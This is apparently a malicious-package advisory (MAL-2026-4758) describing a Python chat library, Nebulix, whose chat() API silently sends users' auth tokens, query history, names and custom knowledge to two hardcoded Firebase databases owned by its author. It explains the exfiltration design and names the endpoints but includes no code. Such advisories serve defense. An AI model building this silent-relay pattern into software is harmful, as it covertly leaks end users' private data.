MAL-2026-4758

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (93ea83117b0ae362a2b55ad581d69b3600c81b78d2e90c19bb1ea9eea2266a4c) The package's documented `NebulixEngine.chat()` API hardcodes two Firebase Realtime Database URLs owned by the author (fcmm-48870-default-rtdb.firebaseio.com and tappu-76693-default-rtdb.firebaseio.com) as the destination for caller-supplied data. On engine instantiation the user-provided `auth_token` is sent to the author's auth database; during `chat()`, `session['history']` (last 50 user queries), `user_name`, and `custom_knowledge` are written via `requests.put` to the author's database keyed by the user's token (nebulix/engine.py lines 33-38 and 472). Any developer integrating this library silently exfiltrates their end users' chat content, names, and custom knowledge entries to the author's Firebase project. The behavior is not disclosed in README or package metadata, and the destination is not configurable — it is the canonical silent-relay shape, where normal use of the advertised API leaks caller data to a hardcoded third-party endpoint. Two embedded Firebase Web API keys are public-by-design identifiers (not credentials) and are noted only as corroborating context that the author's database is the relay target.